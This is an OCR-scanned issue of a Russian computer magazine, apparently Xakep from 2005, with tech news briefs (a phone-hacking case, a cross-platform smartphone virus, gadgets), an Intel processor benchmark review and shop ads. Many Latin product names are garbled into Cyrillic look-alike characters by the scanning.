с подружкой. Снимки попали на 
ОепМау.сот, а через этот сайт о 
них узнал весь мир. Пэрис Хилтон 
привлекла к расследованию чуть 
ли не всю полицию штатов, и, в 
конце концов, негодяя нашли. Оказалось, что малолетний телефонный 
хулиган, на самом деле никакой не хулиган, а самый настоящий фри- 
кер-мафиози, хакнувший крупнейшие телефонные компании АОІ_, Т- 
МоЬіІе, І_ехізЫехі5, кучу интернет-провайдеров и сотовых операторов. У 
парня нашли телефонную базу данных многих знаменитостей, собран- 
ную с телефонов жертв, подобных Пэрис, и приватные фотоснимки гол- 
ливудских звезд. Фрикер оказался не одиночкой и действовал с груп- 
пой сообщников — таких же тинейджеров-фрикеров. На суде чувака 
признали виновным и отправили на год в исправительную колонию для 
несовершеннолетних. А после отсидки его ожидают еще 2 мучительных 
года без компьютеров, сотовых телефонов и Интернета. 








подкожный 

ДИСПЛЕЙ 




Король -ѵ ' 

64-битных двуядерных платформ 
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Нанотехнологии собираются в будущем творить настоящие чудеса. 
Например, американский инженер Джина Миллер представила общест- 
венности готовый концепт подкожного дисплея. Причем это вовсе не из 
области фантастики, а основано на реальных научных исследованиях. 
Под поверхность кожи на внешней стороне кисти планируется внедрять 
порядка трех миллиардов микроскопических роботов-пикселей, кото- 
рые, испуская фотоны, будут формировать на поверхности кожи требу- 
емое изображение. Для управления дисплеем достаточно будет просто 
прикоснуться к нему пальцем другой руки. Основное предназначение 
данной концепции не функции КПК (хотя такое тоже возможно), а вы- 
вод информации от путешествующих по организму медицинских нано- 
роботов, а также управление их деятельностью. Но пока все это описа- 
но лишь «на бумаге», о каких-либо сроках начала полноценных экспе- 
риментов, а тем более массовой реализации, нигде не упоминается. 



РОБОТ-АКРОБАТ 

Всеобщее мнение о том, что ро- 
боты медлительные и неповорот- 
ливые истуканы, начинает посте- 
пенно развеиваться. И данный 
экземпляр очередное тому подт- 
верждение. В Токийском Универ- 
ситете собран 60-ти килограммо- 
вый робот по имени В ОапееІ, ко- 
торый может не только поднять- 
ся с пола на ноги, но и сделать 
это эффектным способом, почти 
как хорошо натренированный че- 
ловек. Для этого он, лежа на спи- 
не, сначала, поднимая ноги, пе- 
рекатывается на спину, и затем, 
получив достаточный импульс, 
резко возвращается в исходное 
положение и встает на ноги. 
Естественно, это не конечная цель 
разработки — предполагается и 
дальше совершенствовать под- 
вижность роботов, обучая их новы- 
ми движениями, в частности, в ско- 
ром времени они смогут даже пры- 
гать. Как знать, может быть, со 
временем такие роботы восстанут 
против нас :). 





Поддерживает двуядерные процессоры Іпіеі 
с архитектурой 64-бит. 

Использует технологию 'ЮТ5 соппесГ, 
обеспечивающую 7.1 -канальное аудио. 

Встроенная сетевая карта 10/100/1000 
с интерфейсом РСІ-Е. 

Реализует технологию Динамического 
Оверклокинга 3-го поколения ООТЗ. 



91 5Р Ыео2-Р 




Поддерживаются процессоры Іпіеі Репбит4 
серий 5ХХ, 6ХХ (ЕМ64Т) и Сеіегоп Э серии ЗХХ 
в корпусе ЦЗА775. 

Поддерживается память ООР2 400/533 
объемом до 4ГБ. 

Встроенная сетевая карта 10/100/1000 

7.1 -канальное аудио 



К8Ы 81.1-Р 




Поддерживает процессоры АІѴЮ АіЫоп 
64/РХ/Х2 с двуядерной архитектурой. 

Два разъема расширения РСІ-Е хі 6 с 
поддержкой технологии 5І_І. 

5АТА2 РАЮ (с ПО І\ІѴ РАЮ), поддерживающий 
режимы РАЮ 0, 1 , 0+1 , .ЛВСЮ. 

7.1 -канальное аудио, совместимое с АС97 ѵ.2.3. 
Интерфейс ІЕЕЕ1394. 




Все вышеперечисленные функции опциональны для всех изделий М5І. 

М5І - зарегистрированная торговая марка компании Місго-ЗІаг ІпІ'І Со., НФ 
Спецификации могут изменяться без предварительного уведомления. 

Все зарегистрированные торговые марки являются собственностью своих владельцев. 
Любые конфигурации, отличные от оригинальных, не гарантированы. 
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НІТЕСНМЕѴѴЗ ▼ 



НМЕѴѴЗ ▼ 



ДНК ИЗ РОБОТОВ 



л 

о 

2 



космос для 

ПРОГРАММЕРОВ 




Под руководством Джозефа Джекобсона команда ученых из Масса- 
чусетского Технологического Университета создала целую колонию 
небольших роботов, которые могут самостоятельно собираться в 
сложные конструкции, имитирующие структуру ДНК. Все собранные 
роботы делятся на два типа — зеленые и желтые, причем каждый из 
них способен определят цвет соседнего. Каждый робот постоянно 
стремится соединиться с двумя другими, при этом старается, чтобы к 
нему были одновременно присоединены роботы лишь разных цветов. 
Если какое-то звено опознает ошибку, что к нему подсоединились од- 
ноцветные роботы, то система может автоматически перестраивать- 
ся для создания правильной конфигурации. Действуя по вышеопи- 
санному принципу, за непродолжительное время из беспорядочной 
кучи стройматериалов выстраивается организованная структура, 
причем какая конструкция получится в результате, изначально пре- 
дугадать нельзя. 



Компания Огасіе объявила об окончании конкурса Огасіе Зрасе 
Зѵѵеерзіакез, главным призом была путевка в космос. Победителем 
стал Брайан Эмметт, 30-летний программист из фирмы Зігукег. Вы- 
полнив тестовое задание, где предлагалось написать сложную прог- 
рамму, он отправил решение в Огасіе. Все, кто прошел отбор, приня- 
ли участие в компьютерной жеребьевке, и Брайан оказался самым 
счастливым. Программист отправится любоваться звездами в иллю- 
минаторе после прохождения тренировки на частном корабле компа- 
нии Зрасе Асіѵепіигез. Эта компания уже успешно отправляла в кос- 
мос двух туристов — Дэнниса Тито и Марка Шаттлуорта, и в будущем 
планирует поставить такие круизы на широкую ногу. Что ж, пожелаем 
Брайану удачи и незабываемых впечатлений, все-таки не каждый 
день в космос летают программисты. 



ЧАСЫ — КЛЮЧ 

Для своих новых роскошных автомобилей Сгоѵѵп, представленных в Япо- 
нии в начале октября, корпорация Тоуоіа разработала новый тип беспро- 
водных ключей. Отныне больше не надо постоянно носить с собой бре- 
лок центрального замка, теперь функции ключа выполняют специальные 
наручные часы, которые с виду сложно отличить от обыкновенных. Те- 
перь для того, чтобы открыть любую из дверей достаточно просто потя- 
нуть за ручку, и если система определит, что на владельце правильные 
часы, то дверь откроется. Точно также для включения или выключения 
зажигания достаточно просто нажать соответствующую кнопку. Для тех, 
кому неохота пачкать руки о дверную ручку, на часах предусмотрены 
еще и кнопки дистанционного управления. Оборудование машины но- 
винкой обойдется покупателю в дополнительные 42000 йен. 




В САМАРЕ КОНФИС- 
КОВАЛИ МИЛЛИОН СО 

С августа по сен- 
тябрь в Самаре про- 
шел крупный антипи- 
ратский рейд, в ре- 
зультате которого 
правоохранительные 
органы конфискова- 
ли около миллиона 
пиратских СЭ (всего 
на 100 миллионов 
рублей). Большую 
часть партии изъяли 
в одном из подпольных складов, где диски упаковывали с помощью 
специальной техники и развозили по точкам реализаторов. Имена вла- 
дельцев склада не афишируются, но уже известно, что диски принад- 
лежат организации «Союз», в которую входят несколько пиратских 
компаний. Если милиции действительно удалось накрыть столь серь- 
езного поставщика, то им есть чем гордиться — мне вспоминается 
лишь пара-тройка случаев конфискации в России партии такого масш- 
таба. Хотя эксперты сомневаются в честности наших блюстителей по- 
рядка, так как в Самаре не те объемы продаж, чтобы имело смысл хра- 
нить в одном месте миллион СЭ. Но дело заведено и, как говорится, 
ведется следствие. Мое сочувствие самарским читателям, на родине 
которых возможно ожидается дефицит дешевого вареза. 





Товар сертифицирован 



НІТЕСНЫЕѴѴ5 ▼ 



НІТЕСНЫЕѴѴЗ Ж 



УМНАЯ ПОДСТАВКА 



АРРІ.Е ЫАЫО 



ДЛЯ ПИВА 

В момент отдыха от тяжелой научной деятельности, а именно во время 
распития в баре пива со своими студентами, двоим друзьям-ученым из 
германского университета пришла в голову гениальная идея. Каждый 
раз, когда очередная кружка пива подходит к концу, изрядно утомляет 
подзывать официантку, ждать, пока она подойдет, примет заказ, схо- 
дит за ним... Было бы гораздо проще, если бы это все происходило ав- 
томатически. Так и появилась на свет интеллектуальная подставка для 




пивной кружки. Данная подставка 
постоянно регистрирует вес круж- 
ки, и когда это значение опускает- 
ся ниже заданного предела (а это 
означает, что пиво у клиента под- 
ходит к концу), то через беспро- 
водное соединение подается спе- 
циальный сигнал официантам, 
чтобы те принесли еще пива на 
нужный столик. Получившийся де- 
вайс пока еще не совсем дорабо- 
тан, на данный момент он весит 
110 грамм и обходится в 100 дол- 
ларов, однако создатели убежде- 
ны, что к моменту запуска массо- 
вого производства цена и габари- 
ты устройства должны существен- 
но уменьшиться. К тому же пред- 
полагается приспособить подстав- 
ку и для других целей, например, 
для проведения в спортивных па- 
бах различных голосований и дис- 
куссий. 




Компания Арріе представила очередной плеер из семейства іРоб. Арріе уда- 
лось на эксклюзивных правах договориться с Затзипд о существенном сни- 
жении цен на флэш память, в результате стартовая цена іРосІ папо состави- 
ла всего 199$ за 2 Гб модель и 249$ за 4 Гб модель. После такого падения 
цен другие производители плееров были вынуждены пересматривать цену 
на свои устройства. К тому же Арріе, заменив линейку ІРосІ тіпі (с жестким 
дисков) на ІРосІ папо, нанес также ощутимый удар и по производителям 
жестких дисков, которым сразу стали предрекать резкое падение спроса на 
их продукцию, а в дальнейшем и вообще полное вымирание жестких дисков 
как класса. Внешне плеер ІРосІ папо выполнен в классическим для Арріе ди- 
зайне, однако отличается просто феноменальной толщиной — всего 6.9 мм, 
и весом — всего 42 г. Время работы от батареи в режиме прослушивания 
музыки, составляет 14 часов. Плеер воспроизводит форматы ААС (от 16 до 
320 Кбит/с), Ргоіесіеб ААС, МРЗ (от 16 до 320 Кбит/с), МРЗ ѴВВ, АибіЫе, 
Арріе І_055Іе53, ѴѴАѴ и АІРР. Также ІРосІ папо оборудован цветным І_СО дисп- 
леем, на котором можно просматривать картинки распространенных фор- 
матов. В папо отказались от поддержки РігеѴѴіге, поэтому подключение к 
компьютеру возможно только через интерфейс 115В. 







ньюсы 015 ] 




[ХАКЕР 10 [82] 05 > НЬЮСЫ 016 ] 



НІТЕСНМЕѴѴЗ ▼ 



ИЫЕѴѴЗ ▼ 




Ежегодно компания Ыеітап Магсиз Огоир выпускает рождественский ката- 
лог подарков, предназначенный для богатых и безумно богатых людей. В 
последний из таких каталогов попало более чем интересное транспортное 
средство, внешне напоминающее смесь гоночного автомобиля и реактив- 
ного самолета. Летательный аппарат с вертикальным взлетом, под назва- 
нием Зкусаг М400, может развивать максимальную скорость в 560 км/ч. 
Предельная высота полета составляет 9700 метров, а расход топлива — 
всего один литр на 9 километров. Создатель аппарата Пол Моллер убеж- 
ден, что примерно через три года интенсивных доработок его летательное 
средство сможет стать таким же удобным и безопасным как обычный ав- 
томобиль. К тому времени он планирует наладить продажу подобных ап- 
паратов уже небольшим тиражом. Пока же транспортное средство нахо- 
дится в стадии прототипа, но все-таки готово отдаться в добрые руки за 
3,5 миллиона долларов. Вот только будущий счастливый обладатель вряд 
ли сможет воспользоваться данным аппаратом по назначению, для того 
чтобы утрясти все официальные формальности и получить добро на 
взлет, придется пройти огромное количество инстанций. 



циничный 

ФОНТАНЧИК 




В Праге появилась уникальная бронзовая скульптура, изображающая 
двух мужчин за справлением естественной нужды. Автором данного 
«произведения искусства» стал отмороженный чешский архитектор Дэ- 
вид Черный, известный своими эксцентричными творениями. Самое 
интересное в том, что скульптура не является монолитной: тазовые час- 
ти памятников могут вращаться в горизонтальной плоскости, а «мембе- 
ры» — в вертикальной. Таким образом через компьютер можно пол- 
ностью управлять направлением струй, и тем самым вырисовывать на 
поверхности воды у ног определенные символы. В свободное время па- 
мятники посимвольно выписывают изречения известных личностей, но 
если отправить ЗМЗ на специальный номер, то скульптуры отвлекутся 
от своего привычного занятия и постараются изобразить на воде текст 
присланного сообщения. Естественно, автор не собирается останавли- 
ваться на достигнутом и вынашивает идеи все новых проектов. Одним 
словом, нашему Церетели есть куда стремиться. 



НОВАЯ ЗАЩИТА ДЛЯ 
НОВОЙ ПРИСТАВКИ 
ОТ М3 




Компания МісгозоЙ, которая известна не только выпуском ѴѴіпсІоѵѵз, но и 
своей навороченной игровой приставкой ХЬох, с грустью наблюдает за от- 
ношением игроманов к своему икс-детищу. Мало им винта, видите ли, ма- 
ло внедренной памяти. Но то, что расширяют встроенные возможности, это 
еще ладно, так ведь, ироды, встраивают новые. Всякие нехорошие чипы, 
которые позволяют копировать и проигрывать пиратские диски. «Безобра- 
зие прекратить! Уволю всех нах» — воскликнул Билл Гейтс, хлопнув кула- 
ком по столу. . . и работники МісгозоЙ тут же предложили решение. Как из- 
вестно, к Рождеству этого года компания готовится представить миру прис- 
тавку нового поколения ХЬох 360. От предшественника она будет отличать- 
ся еще более мощным процессором, еще более продвинутой архитектурой 
и еще более крутыми возможностями. Но отличие будет не только в этом — 
защита в новом ХЬох будет реализована теперь на аппаратном уровне. 
Взломать ее намного сложнее, и одними мозгами не обойтись — понадо- 
бится дорогое оборудование. Сами разработчики защиты не отрицают воз- 
можность взлома одной приставки, но считают, что вряд ли хакерам удаст- 
ся найти универсальный ключ, который подходил бы ко всем иксбоксам. 
Поживем — увидим. Добавлю только, что стоимость ХЬох в базовом комп- 
лекте будет составлять 300$, а полный вариант — на 1 00$ дороже. 



ПИОНЕР ИНТЕРНЕТА 
ОБВИНЕН В КОМПЬЮ- 
ТЕРНОМ ВЗЛОМЕ 

Не ценят в Британии заслуги 50-летнего Клиффорда Стэнфорда. А ведь де- 
душка в далеком 1 992 году создал одну из первых в мире коммерческих ком- 
паний, предоставляющих доступ к Интернету. И вот теперь его, вместе с част- 
ным детективом Джорджем Лайдделом приговорили к 6 месяцам тюрьмы и 
20 тысячам фунтов штрафа за компьютерный взлом. Стэнфорд даже не от- 
рицал вину. Да, было дело, давно, правда, но было. В 2000 году в Великобри- 
тании шло громкое судебное разбирательство, в котором фигурировала не- 
кая Ширли Портер, работавшая на правительство и занимавшая когда-то 
важный пост. Дамочка оказалась не в меру предприимчивой, и вокруг ее име- 
ни гремели громкие скандалы. В конце концов, ее разжаловали и за какие-то 
махинации потребовали в судебном порядке штраф в размере 27 миллионов 
фунтов. Ширли, к тому времени уже скрывающаяся в Израиле от британских 
властей, заявила, что денег у нее таких отродясь не было, и платить она не в 
состоянии. Казалось бы, причем тут Клиффорд Стэнфорд? Дело в том, что 
Клиффорд хакнул мыло мадам Портер, и, прочитав ее переписку, а также 
воспользовавшись услугами сыщика, достал доказательства того, что Шир- 
ли далеко не такая бедная, какой себя считает. Эту информацию 50-летний 
британец собирался использовать, чтобы надавить на ее сына, который ме- 
шал его бизнесу. Чем все это закончилось — ты уже в курсе. Сначала Клиф- 
форда собирались судить за шантаж, но потом оставили только статью за 
компьютерный взлом. Тюремное заключение, впрочем, отстрочили на 2 года. 





НАВОЫЕѴѴЗ 



][ЫЕѴѴ5 ▼ 




Компания Заплзипд одновременно анонсировала сразу три ги- 
гантские панели, выполненные по технологии РЭР, І_СЭ и ОІ_ЕЭ. 
Диагональ плазменной панели составляет 102 дюйма, жид- 
кокристаллической — 82, а на органических светодиодах — 40. 
Однако особый интерес представляет именно последний прото- 
тип. Это самая крупная в мире ОІ_ЕЭ (Огдапіс Ыдіпі ЕтіИіпд 
Эіосіез) панель, при этом она обладает более чем внушительны- 
ми характеристиками. Разрешение равняется 1280x800, что хоть 
и не идеально, но подходит для просмотра РЮТѴ. Время отклика 
обещается быть в 1000 раз меньше у І_СЭ, в связи с чем теряет- 
ся всякий смысл вообще указывать этот параметр. Контраст- 



ГИБРИДНЫЙ ВИРУС 

Недавно в сети антивирусных 
компаний попался принципиаль- 
но новый тип вредоносной прог- 
раммы. Вирус, названный СагсКгр 
способен поражать не только 
смартфоны на платформе Зегіез 
60 (ІЧокіа 6600, Ыокіа 7610, ІМокіа 
7610, Зепсіо X, Зіетепз 3X1 и не- 
которые другие), но и полноцен- 
ные ПК под управлением ѴѴіпсІоѵѵз. 
Заражение происходит следую- 
щим образом: сначала деструк- 
тивный код попадает на смарт- 
фон либо через сообщение ММ3, 
либо по каналу ВІиеІооіИ. Затем 
вирус ищет в телефоне извест- 
ные ему приложения и подменя- 
ет их файлы неработоспособны- 
ми копиями, после чего прове- 
ряет наличие в телефоне карты 
памяти и пытается записать на нее червя ѴѴикіІІ.В и троян ВегЬеѵѵ.А 
(который к тому же ставит на автозапуск). 

Дальнейшее уже зависит от бдительности пользователя. Эксперты 
считают, что основное предназначение данного вируса — именно 
заражение ПК. Наверное, создатели СагсЙгр рассчитывали на то, 
что юзер, обнаруживший неисправность сотового, вынет карту из 
телефона, вставит ее в компьютер, попробует найти причину не- 
исправности и случайно запустит червя или троян. На данный мо- 
мент СагсИгр не представляет какой-либо серьезной угрозы, но не 
исключено, что он был всего лишь тестовым вариантом, за кото- 
рым последуют доработанные модификации. Как говорится, 
кросплатформенность — это точно наше будущее и не обязательно 
оно будет радужным :). 
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ность находится на уровне 5000:1 , а яркость — 600 кд/м2. Допол- 
нительно стоит отметить, что угол обзора со всех сторон вплот- 
ную приближается к развернутому, энергопотребление весьма 
мало, а толщина окончательного варианта панели должна соста- 
вить не более 3 см. Хоть на сегодняшний день технология ОІ_ЕЭ 
еще и не решается начать наступление на І_СЭ среди мониторов 
и телевизоров, а ограничивается лишь плеерами и сотовыми те- 
лефонами, но у нее есть уже все шансы вступить в эту борьбу в 
ближайшие годы. Но на данный момент, конечно, о сроках пос- 
тупления новинки на прилавки ничего не говорится. 



ПЛЕЕР НА ТОПЛИВЕ 

Компания ТозМЬа 
представила два рабо- 
тоспособных прототи- 
па трЗ плееров, функ- 
ционирующих на осно- 
ве топливных элемен- 
тов питания типа ЭМРС 
(Эігесі Меіапоі РиеІ 
СеІІ), где в качестве 
топлива выбран высо- 
коконцентрированный 
метанол (99,5 %). Пер- 
вый анонсированный плеер, оснащенный флэш памятью, работает от ба- 
тареи мощностью 100 мВт (милливатт в час). Одной заправки должно 
хватать на весьма внушительное время — 35 часов непрерывного восп- 
роизведения музыки, причем для этого потребуется всего лишь 3,5 мл 
метанола. Второй плеер хранит информацию на жестком диске, и, конеч- 
но, требует более мощную батарею — на 300 мВт. В этом случае для пол- 
ной заправки требуется уже 1 0 мл топлива, но при этом и время работы 
сразу возрастет до 60 часов. Бесспорно, по сравнению с литий-ионными 
аккумуляторами, это выдающиеся результаты, но пока остаются откры- 
тыми еще несколько вопросов. В частности, производителей откровенно 
не устраивают внушительные габариты самих батарей, которые состав- 
ляют 23x75x10 мм и 60x75x10 мм. Точная дата поступления устройств в 
продажу и их ориентировочная стоимость пока не сообщаются, скорее 
всего, их отправят на дальнейшую доработку. 





НАДЁЖНОСТЬ 
СТАНОВИТСЯ ДОСТУПНЕ 

п ишод ц. ИгіМфЧМЦМІ # 

шшшчщ 

как шр* нить 

ИНФОРМАЦИЮ 



ьЦ РИСКА ВЦ ПОТЕРЯТЬ] 





ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ИЕ [ГЕККІШ] НЬЮСЫ 







[іпіго] 



[методика тестирования] 



[тестовый стенд] 



ОДНА ГОЛОВА ХОРОШО, 
НО БЫВАЕТ И ДВЕ 

Окунев Дмитрий, Шамаев Дмитрий, іезі_ІаЬ (іе5і_ІаЬ@датеІапсІ.ги) 



Процессор... Сколько споров о важности 
этого компонента системы минуло за всю 
компьютерную историю — все и не сосчи- 
тать. И пусть сейчас, когда на среднеста- 
тистический домашний комп ложится са- 
мый широкий спектр задач: от простого на- 
бора текстов до крутейших ЗО-игр и оциф- 
ровки видео, и пальма первенства иногда 
переходит и к другим девайсам (в зависи- 
мости от требований юзера), «камень» все 
равно остается основной строчкой в прайс- 
листе при покупке или апгрейде системы. 


Это объяснять, думаем, не надо — доста- 
точно сказать, что какой бы дорогой и мощ- 
ной видеокартой ты не обладал, она не 
раскроет и половины потенциала, если наг- 
ружать командами ее будет кремниевый 
«старичок» трехлетней давности. Про при- 
ложения, требующие сложных вычислений, 
и вовсе умолчим :). Вот так, исходя из этих 
мыслей, мы решили посвятить очередной 
материал тестированию процессоров ІпіеІ 
для платформы І_ѲА775 — как бюджетных, 
так и высокопроизводительных... 


Чтобы выявить все сильные и слабые сторо- 
ны процессоров, мы пустили через них до- 
вольно обширный набор тестов. В их число 
вошли ставший уже классикой ЗРМагк'01 
ЗЕ, программа ЗирегРІ, вычисляющая на 
время число Пи с точностью 1 Мб, а также 
бенчмарк, встроенный в архиватор ѴѴіпВАВ 
3.50. Игровое приложение было представ- 
лено ІІпгеаІ Тоигпатепі 2004, прогоняемой 
на максимальной детализации с минималь- 
ным разрешением — так основная нагрузка 
ложится именно на процессор, а не на видео- 


подсистему. Кроме того, применялись тесты 
на кодирование аудио и видео — с по- 
мощью программ Ехасі Аибіо Сору (кодек 
Бате, используемый битрейт -ѴВВ 160 
КЬрз) и Оогсііап Кпоі, сжимающей видеопо- 
ток в формат РіѵХ (использовалась версия 
кодека 5.11). Для проверки двухъядерных 
процессоров и камней с Нурег-ТІігеасІіпд на 
работу в их родной среде — мультизадач- 
ное™, мы повторно использовали Ехасі 
Аибіо Сору и ЗирегРІ, но на этот раз с парал- 
лельно работающим тестом ѴѴіпВАВ. 



Материнская плата: Азиз Р5АР2-Е Ргетіит 

Память: 2x512 Мб Согзаіг СМ2Х512А-5400Ш 3-2-2-8 

Видеокарта: 256 Мб Азиз ЕІМ7800СТХ ТОР 

Кулер: 2аІтап С1ЧРЗ 7700Си 

Жесткий диск: ѴУезіегп РідііаІ ѴѴР200 ЗАТА 

Блок питания:480 Вт "Ппегтаііаке РигеРоѵѵег ВиКегіІу ѴѴ0020 



іѳзі_ІаЬ выражает благодарность за предоставленное на тестирование оборудование компаниям: НИКС - Компьютерный 
Супермаркет (т.(095)974-3333, \ллллл/.піх.ги), Шга ЕІесігопсз (т.(095)775-7566, \ллллл/.иІігасотр.ги), а также российскому 
представительству компании ІпіеІ. 
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[технологии] 



Пройдя долгий технологический путь от 
ядра ІМогіііѵѵоосі до новомодных Ргезсой 
2М, процессоры Іпіеі Репііит 4 обросли 
огромным количеством полезных техно- 
логий, без которых их сейчас уже просто 
невозможно представить. Естественно, 
не все они используются в каждой моде- 
ли — некоторые находятся в списке 
Реаіигез лишь самых дорогих процов, но, 
тем не менее, в лицо их знать надо. 
Нурег-ТПгеасІіпд — наверное, наиболее 
широко разрекламированная «фишка» 
Іпіеі Репііит 4. Заключается она в том, 
что логически в системе находится не 
один, а сразу два «камня» — в опреде- 
ленных ситуациях это позволяет полу- 
чить выигрыш в производительности. 
На самом деле технология — не более 
чем эмуляция, поэтому и прирост наб- 
людается крайне редко, а точнее, лишь 
в оптимизированных приложениях, ко- 
торых не так уж много. Но есть у нее и 
неоспоримое преимущество — при од- 
новременной работе нескольких при- 
ложений (например, оцифровке аудио 
и архивации данных) конкурировать по 
производительности с Нурег-ТНгеасІіпд 
может разве что полноценный двуя- 
дерный проц, но это уже совсем другая 
ценовая категория. ЕМ64Т (Ехіепбесі 
Метогу 64 ТесИпоІоду) — технология, 
ставшая запоздалым ответом Іпіеі на 
процессоры АІѴЮ А1Ыоп64 и пришедшая 
вместе с ядром Ргезсоіі 2М. Проще гово- 
ря, обыкновенная 64-х битная архитекту- 
ра. В принципе, внедрив эту технологию 
гораздо позже АІѴЮ, Іпіеі много не поте- 
ряла — приложений, использующих пре- 
имущество таких процов, до сих пор не 
так уж много. А если учесть, что 64-х бит- 
ная версия ѴѴіпсІоѵѵз, без которой от ар- 
хитектуры толку нет вообще, появилась 
в продаже совсем недавно, то политика 
компании и вовсе кажется во всех отно- 
шениях правильной. ЕІЗТ (ЕпІіапсесІ Іпіеі 
ЗреесІЗіер) — технология, как и ЕМ64Т, 
впервые введенная в ядре Ргезсоіі 2М и 
представляющая собой аналог давно ис- 
пользуемой АІѴЮ СооГп'ОиіеІ, понижаю- 
щей частоту «камня» в моменты невысо- 
кой нагрузки. Функция эта перешла с мо- 
бильных процессоров, где она использо- 
валась в целях энергосбережения, и если 
на Оезкіор-системах такой проблемы 
нет, то есть другая, не менее острая — 
перегрев. Вот с ним-то и борется ЕІЗТ, 
анализируя загрузку «камня», и, в слу- 
чае, если она невысока, банально зани- 
зжет его множитель и напряжение пита 
ния — и тем- пература меньше, и кулер 
при соответствующей настройке тише... 
ХЭ-бит — не менее важная технология, 
позволившая реализовать безопасность 
системы на аппаратном уровне. Обнару- 
жив в памяти код с вредоносным воз- 
действием, этот волшебный бит просто 
запретит его выполнение, тем самым, 
сберегая твою систему от сбоя. Естест- 
венно, это не освобождает тебя от необ- 
ходимости использования файрвола и 
хорошего софтового антивируса, но, тем 
не менее, здорово помогает в борьбе со 
многими проблемами. Тем более, что 
для работы этой технологии не нужно 
ничего, кроме ѴѴіпсІоѵѵз ХР с установлен- 
ным Зегѵісе Раск 2. 
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Кодирование аудио в ѴВР дается слабым процессорам не легко... 
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Іпіеі Репііит 4 ЕЕ 3,73 в этом тесте обошел основного конкурента — 

Іпіеі Репііит 4 670, что, впрочем, не удалось ему при кодировании аудио. 
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Недешевая двухъядерная модель с индексом 820 в этом тесте не дотянула даже до Іпіеі Репііит 4 530. 



[выводы] 



НАГРАДУ «НАШ ВЫБОР» — ЗА ВЫСОЧАЙШУЮ ПРОИЗВОДИ- 
ТЕЛЬНОСТЬ СРЕДИ ВСЕХ УЧАСТНИКОВ ТЕСТИРОВАНИЯ И 
ПОДДЕРЖКУ ВСЕХ СОВРЕМЕННЫХ ТЕХНОЛОГИЙ — ЗАБИРАЕТ 
ПРОЦЕССОР ІІЧТЕІ. РЕІЧТІІІМ 4 670, ДОКАЗАВШИЙ, ЧТО ПОЯВ- 
ЛЕНИЕ ДВУХЪЯДЕРНЫХ РЕШЕНИЙ ДЛЯ ДОМАШНИХ СИСТЕМ 
ЕЩЕ НЕ ОЗНАЧАЕТ ВЫМИРАНИЕ ОБДЕЛЕННЫХ ВТОРЫМ ЯД- 
РОМ МОДЕЛЕЙ. НУ А «ЛУЧШУЮ ПОКУПКУ» МЫ ОТДАЕМ ІІЧТЕІ. 
РЕІЧТІІІМ 4 530 — ВСЕ-ТАКИ «КРЕПКИЙ СЕРЕДНЯЧОК» В СРЕД- 
НЕСТАТИСТИЧЕСКОЙ СИСТЕМЕ ГОРАЗДО БОЛЕЕ АКТУАЛЕН, 
ЧЕМ ДОРОГУЩИЕ МОДЕЛИ С ЗАОБЛАЧНЫМИ ЧАСТОТАМИ... 







РОьХтв 

СЕТЬ КОМПЬЮТЕРНЫХ ЦЕНТРОВ 



17555557 

ѵ\ллллі.роІагІ8.ги 




Дарите подарки 

которых ждут 





Выбирая компьютер АдеІЧТ на базе процессора ІпІеГ Реп1іит®4 
с технологией НТ Вы оправдаете все ваши ожидания! 

Улучшенная производительность в мультимедийных приложениях. Расширенные возможности 
редактирования цифрового фото и видео. Непревзойденная скорость обработки музыки. И самое удивительное - 
возможность делать всё это одновременно благодаря процессору ІпІеГРепйипгГ4 с технологией НТ! 



Л/Г 



• 3-х летнее бесплатное обслуживание, включая год полной гарантии 

• бесплатное обслуживание на рабочем месте в Москве (в пределах МКАД) 



► 100% предпродажное тестирование 

► отличные характеристики для работы дома и в офисе 



сотриіег 



СЕТЬ КОМПЬЮТЕРНЫХ ЦЕНТРОВ РОІ.АК 



і. БагратионовскаяДВК "Горбушкин Двор", пав.: Е2 - 14/15, Е2 - 1 1 (095)755-5513 

і. Братиславская, ул. Братиславская, д.1 6, стр.1 (095)237-8240 

і. Динамо, ул. 8 Марта, д.1 0, стр.1 (095)262-8039 

і. Дмитровская, ул. Башиловская, д.29/27 (095)678-5470 

і. Комсомольская, ун-г «Московский», 4 этаж, пав.: 27 (095)359-891 5 

і. Красносельская, ул. Краснопрудная, 22/24 (095)389-4622 

і. Красносельская, ул. Русаковская, д.2/1 (095)784-6385 

і. Люблино, ТК "Москва", 2 этаж, 1 линия (095)784-661 5 

і. Пл. Ильича, ул. Сергия Радонежского, 31 (095)935-8727 

і. Пражская, ТЦ "Электронный рай", пав.: 1 Б-47, 2В-1 4,1 В-18, ЗП-9к (095)129-1 119 

і. Профсоюзная, Нахимовский пр-т, 40 (095)91 6-5627 

і. Пушкинская, ул. Малая Дмитровка, 1/7 (095)973-1 1 33 

Савеловская, ВКЦ "Савеловский", ул. Сущевский Вал, д.5, пав.: 2Р-5,024 (095)730-1 549 

і. Савеловская, Сущевский вал, 5, стр. 20, ТК "Салют 5", пав.: К-5 (095)200-3060 

і. Савеловская, Сущевский Вал, 3/5 (095)264-1 333 

і. Сокол, Волоколамское ш., 2, в здании «ГИДРОПРОЕКТ» (095)797-8986 

і. Шаболовская, ул. Шаболовка, 20 (095)347-9638 

і. Щукинская, ул. Новощукинская д.7 (095)797-8064 



Санкт-Петербург, м. Новочеркасская, Новочеркасский пр-т, 51 

Санкт-Петербург, м. Пр.ПросвещенияДК "НОРД", 2-й этаж, пав.: 204 

Санкт-Петербург, м. Сенная, ТЦ "ПИК", 3 этаж, пав.:304 

Санкт-Петербург, м. Петроградская, Каменноостровский пр., д.45 

Санкт-Петербург, м. Ладожская, ТК "НЕО", 3 этаж, пав.:52 

Воронеж, ул.Кольцовская, 82 

Воронеж, ул.Кольцовская, 29 

Екатеринбург, пр-т Ленина, 99 

Казань 

Краснодар 

Нижний Новгород, Пл. М. Горького, ул.Звездинка, 3 
Нижний Новгород, м. Канавинская, ТЦ "Новая Эра", 1 этаж 
Ростов-на-Дону, пр-т Буденновский, 80 
Ростов-на-Дону, пр-т Буденновский, 9/46 
Ростов-на-Дону, Ворошиловский пр-т, д.1 2 
Самара 

Интернет-магазин: БПрДзЬор.пІ.ги 
Интернет-магазин: Иігр://5000.ги 



(095)444-7636 

(812)331-6244 

(812)449-2441 

(812)346-1190 

(812)449-2348 

(0732)72-7391 

(0732)39-0252 

(343)375-3304 

скоро!! 

скоро!! 

(8312)78-0357 

(8312)16-9787 

(863)292-4242 

(863)269-8558 

(863)240-5353 

скоро!! 

(095)970-1939 




репішт 



